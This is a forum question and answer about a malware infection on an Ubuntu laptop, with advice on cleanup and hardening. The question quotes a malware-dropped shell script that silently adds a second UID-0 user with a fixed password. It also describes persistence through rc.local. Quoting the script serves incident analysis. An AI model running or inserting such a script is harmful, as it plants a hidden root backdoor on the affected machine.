Ubuntu – How to deal with malware on the laptop

malwareSecurity

I am fairly certain that my Ubuntu 13.10 laptop is infected with some sort of malware.

Every once in a while, I find a process /lib/sshd (owned by root) running and consuming lots of cpu. It is not the sshd server which runs /usr/sbin/sshd.

The binary has –wxrw-rwt permissions and it generates and spawns scripts in the /lib directory. A recent one is named 13959730401387633604 and it does the following

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

The gusr user was created by the malware independently, and then the chpasswd hangs while consuming 100% cpu.

So far, I've identified that the gusr user was additionally added to files in /etc/

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

It seems like the malware made copies of all these files with the "-" suffix. The full list of /etc/ files that were modified by root is available here.

In addition, the /etc/hosts file was changed to the this.

The /lib/sshd starts by adding itself to the end of /etc/init.d/rc.local file!

I've removed the user, removed the files, killed the tree of processed, changed my passwors and removed the ssh public keys.

I am aware that I am basically screwed, and I will most likely reinstall the whole system. Nevertheless, since I login to several other machines, it would be good to at least attempt to remove it, and figure out how I got it. Any suggestions on how to go about this would be appreciated.

It seems like they got in on March 25 by brute-forcing root login. I had no idea that root ssh is enabled by default in Ubuntu. I disabled it and put up denyhosts.

The login was from 59.188.247.236, somewhere in Hong Kong apparently.

I got the laptop from EmperorLinux, and they enabled root access. If you have one of those and you're running sshd beware.

Best Answer

First, get that machine off the network now!

Second, why did you have the root account enabled? You really shouldn't enable the root account unless you have a very good reason to do so.

Thirdly, yes, the only way to be sure you're clean is to do a clean install. It's also advised that you start fresh and don't go back to a backup, as you can never be sure when it all started.

I also suggest that you set up a a firewall in your next install and deny all incoming connections:

sudo ufw default deny incoming

and then allow ssh with:

sudo ufw allow ssh

and DON'T enable the root account! Certainly make sure that root ssh login is disabled.

Related Question